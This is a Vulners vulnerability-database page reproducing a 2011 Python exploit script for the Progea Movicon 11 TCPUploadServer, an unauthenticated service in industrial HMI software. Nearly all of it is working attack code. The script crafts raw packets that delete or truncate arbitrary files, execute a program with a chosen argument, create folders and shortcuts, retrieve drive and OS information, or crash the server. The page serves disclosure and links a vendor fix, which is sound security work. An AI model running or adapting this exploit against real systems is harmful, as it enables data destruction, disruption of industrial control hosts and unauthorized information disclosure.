Vulners
Lucene search
Progea Movicon 11 TCPUploadServer Remote Exploit
#!/usr/bin/python
# movi.py
# Progea Movicon TCPUploadServer Remote Exploit
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# TCPUploadServer allows remote users to execute functions on the server
# without any form of authentication. Impacts include deletion of arbitrary
# files, execution of a program with an arbitrary argument, crashing the
# server, information disclosure, and more. This design flaw puts the host
# running this server at risk of potentially unauthorized functions being
# executed on the system.
#
# Tested on Progea Movicon 11 TCPUploadServer running on Windows
#
# Fix: http://support.progea.com/download/Mov11.2_Setup.zip
#
import sys
import socket
hdr="MovX"
funcs=(1,2,3,4,5,6,7,8) # "B" is listed as 8 only for convience. other functions include (the real) 8, 9, A, and V
if len(sys.argv)<3:
print "Progea Movicon TCPUploadServer Remote Exploit"
print "Usage: %s <target> <function> [data]"%sys.argv[0]
print "\nWhat would you like to do?\n"
print "[1] Create a folder"
print "[2] Overwrite a file with NULL and cause 100%% CPU"
print "[3] Delete a file"
print "[4] Execute moviconRunTime.exe with a specified argument"
print "[5] Create a desktop shortcut"
print "[6] Retrieve drive information"
print "[7] Retrieve os service pack"
print "[8] Crash the server\n"
print "* Default data is \"test\""
sys.exit(0)
target=sys.argv[1]
port=10651
cs=target,port
func=int(sys.argv[2])
if len(sys.argv)==4:
data=sys.argv[3]
else:
data="test"
if func not in funcs:
print "Invalid function"
sys.exit(1)
if(func==1):
print "Crafting a packet to create the folder \"%s\"..."%data
pkt=hdr+"1"+"B"+data+"\x00"*(66-len(data))
elif(func==2):
print "Crafting a packet to truncate (or create) the file \"%s\" to 0 bytes and cause 100%% CPU..."%data
pkt=hdr+"2"+"B"+data+"\x00"*(66-len(data))
# O_RDWR|O_CREAT|O_TRUNC, might be more to this, it's supposedly a copy function, but i'm moving on
elif(func==3):
print "Crafting a packet to delete the file \"%s\"..."%data
pkt=hdr+"3"+"B"+data+"\x00"*(66-len(data))
elif(func==4):
print "Crafting a packet to execute moviconRunTime.exe with the argument \"%s\"..."%data
pkt=hdr+"4"+"BB"+data+"\x00"*(65-len(data))
elif(func==5):
print "Crafting a packet to create a desktop shortcut with the name (also appended to the link path) \"%s\"..."%data
pkt=hdr+"5"+"B"+data+"\x00"*(66-len(data))
elif(func==6):
print "Crafting a packet to retrieve drive information..."
pkt=hdr+"6"+"\x01"
elif(func==7):
print "Crafting a packet to retrieve os service pack..."
pkt=hdr+"7"+"\x00"
elif(func==8):
print "Crafting a packet to crash the server..."
pkt=hdr+"B"+"\x00"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)
sock.send(pkt)
sock.send(pkt)
print "\nPacket sent!"
if((func==6)|(func==7)):
info=sock.recv(128)
if(info):
print "\nRetrieved info:\n"
if(func==6):
print "%s"%info[6:]
elif(func==7):
print "%s"%info[22:]
else:
print "\nNo info"
sock.close()
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1